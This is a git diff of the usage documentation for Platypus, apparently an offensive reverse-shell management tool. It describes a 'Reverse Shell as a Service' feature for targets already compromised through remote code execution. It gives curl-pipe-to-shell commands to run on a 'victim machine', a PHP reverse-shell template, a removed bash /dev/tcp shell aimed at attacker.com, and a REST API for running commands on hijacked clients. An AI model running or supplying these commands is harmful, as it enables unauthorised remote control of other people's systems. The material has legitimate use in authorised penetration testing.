diff --git a/USAGE.md b/USAGE.md index 423b518c..f97f0b79 100644 --- a/USAGE.md +++ b/USAGE.md @@ -1,26 +1,40 @@ ## Reverse shell as a Service -Platypus is able to multiplexing the reverse shell listening port. The port 8080 can receive reverse shell client connection, also these is a Reverse Shell as a Service (RaaS) running on this port. -Assume that you have got an arbitrary rce on the target application, but the target application will strip the non-alph letter like `&`, `>`. then this feature will be useful. +Platypus is able to multiplex the reverse shell listening port. Port 8080 can receive reverse shell client connection, also there is a Reverse Shell as a Service (RaaS) running on this port. -To archive this, all you need is to construct a url which indicate the target +Assume that you have got an arbitrary RCE on the target application, but the target application will strip the non-alphabet letter like `&`, `>`. then this feature will be useful. + +To archive this, all you need is to construct a URL that indicates the target. + +### Quick start + +1. Start platypus and listen to any port (eg: 1.2.3.4 1337) +2. Execute `curl http://1.2.3.4 | sh` on the victim machine + +### Specifying language of reverse shell command (default: bash) + +1. Start platypus and listen to any port (eg: 1.2.3.4 1337) +2. Execute `curl http://1.2.3.4/python | sh` on the victim machine + +### What if I want to pop up the reverse shell to another IP (5.6.7.8) and port (7331)? + +By default, the new reverse shell will be popped up to the server which the port which the HTTP request sent, but you can simply change the IP and port by following these steps: + +1. Start platypus and listen to any port (eg: 1.2.3.4 1337) +2. Execute `curl http://1.2.3.4/5.6.7.8/7331/python | sh` on the victim machine + +### How to add a new language + +Currently, platypus support `awk`, `bash`, `go`, `Lua`, `NC`, `Perl`, `PHP`, `python` and `ruby` that were simply stolen from [PayloadAllThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md), and you can check `templates` folder to view all templates. Also, adding new language support is simple, just replace the real IP and port with `__HOST__` and `__PORT__`. ```bash -// victim will be redirected to attacker-host attacker-port -// sh -c "$(curl http://host:port/attacker-host/attacker-port)" -# curl http://192.168.1.2:8080/attacker.com/1337 -bash -c 'bash -i >/dev/tcp/attacker.com/1337 0>&1' -# sh -c "$(curl http://192.168.1.2:8080/attacker.com/1337)" - -// if the attacker info not specified, it will use host, port as attacker-host attacker-port -// sh -c "$(curl http://host:port/)" -# curl http://192.168.1.2:8080/ -curl http://192.168.1.2:8080/192.168.1.2/8080|sh -# sh -c "$(curl http://host:port/)" +php -r '$sock=fsockopen("__HOST__",__PORT__);popen("/bin/sh -i <&3 >&3 2>&3", "r");' ``` ## RESTful API + * `GET /client` List all online clients + ``` # curl 'http://127.0.0.1:9090/client' { @@ -30,7 +44,9 @@ curl http://192.168.1.2:8080/192.168.1.2/8080|sh "status": true } ``` + * `POST /client/:hash` execute a command on a specific client + ``` # curl -X POST 'http://127.0.0.1:9090/client/0723c3bed0d0240140e10a6ffd36eed4' --data 'cmd=whoami' { @@ -38,7 +54,9 @@ curl http://192.168.1.2:8080/192.168.1.2/8080|sh "msg": "root\n", } ``` + * How to hash? + ``` # echo -n "192.168.1.3:54798" | md5sum 0723c3bed0d0240140e10a6ffd36eed4 -